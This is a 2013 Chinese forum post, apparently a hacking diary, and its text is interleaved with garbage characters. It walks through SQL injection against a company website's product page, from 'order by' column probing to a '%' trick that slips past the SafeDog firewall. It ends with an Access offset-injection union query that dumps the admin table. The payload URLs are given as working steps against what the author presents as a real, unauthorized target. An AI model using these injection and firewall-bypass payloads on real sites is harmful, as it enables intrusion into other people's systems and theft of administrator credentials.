打开网站,一个企业站。
" G2 a8 \" X6 x f$ E$ w4 g. I+ ^
6 `9 P5 a! v: B4 L* y2 H# k0 V/ E% Q' J5 u. {! T
顺手加个admin" J. a+ E! |3 q9 B
+ b, d0 J5 I F' L9 s
5 c4 t0 M u, P( T/ k& g默认后台。
+ l% g% c$ E$ ~5 o( R% ~回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。6 W! k! d4 A( D& N2 ~
0 c& \5 H& e; C5 Y7 m1 Z$ ]+ w( e, m; {# g4 v2 P$ j" w' u4 [3 X
5 f$ Q4 T5 ~! q6 k所以就不用御剑扫了,待会直接封IP。
+ Z% D- n4 v: M6 ^
- Y6 m2 l3 i" E% h用order by语句判断是否存在注入。- m) g9 p( T2 z- ^ U
http://www.xxx.com /product_show.asp?id=997 order by 1
& F# t$ d. ?# G& B/ C' {http://www.xxx.com /product_show.asp?id=997 order by 100& t* b+ x. G7 S9 S4 Z
现在存在注入,经测试后发现是9个字段。- I7 {* A( l' u+ h8 e a) C9 B
/ u5 o0 l( [9 w3 d' L2 r0 |
接下来进行联合查询,猜是否存在admin表。
7 S6 C3 ~! o& t" i. g2 V) O8 Ghttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
9 q* b6 J& ]+ r9 r2 z
: z& k% K* t4 G( g6 ?4 m, |6 q8 L
$ Z3 F$ c$ e0 e/ Y) \7 x! ^
在select中间加个%,se%lect绕过安全狗。# d9 M+ n4 |- J9 r
* V4 @9 t0 {. P! K
! u) H1 {1 z) Y发现存在admin表,然后开始手工猜常用的字段。& N) g# l: A7 ?8 v4 e! G4 C
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
0 |9 {1 z. q3 w! Q
5 h) |) s: F- ~7 K4 ?突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
2 y! ]4 L6 z2 \; T/ [
# \- Q& U; T" C$ R" x$ k科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。( q7 U: y) L `8 A0 x; m6 g0 ?
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin* ^8 H' A/ Y* I" i
好了,敏感内容出显了。
% ~% o+ {# k6 [$ R
9 A0 r4 k5 n# W" J" K, a/ f: Q3 E5 l3 x) n# ]/ Z: s
0 {" J& I( M5 D |
发表于 2013-3-8 21:49:45
收藏
支持
反对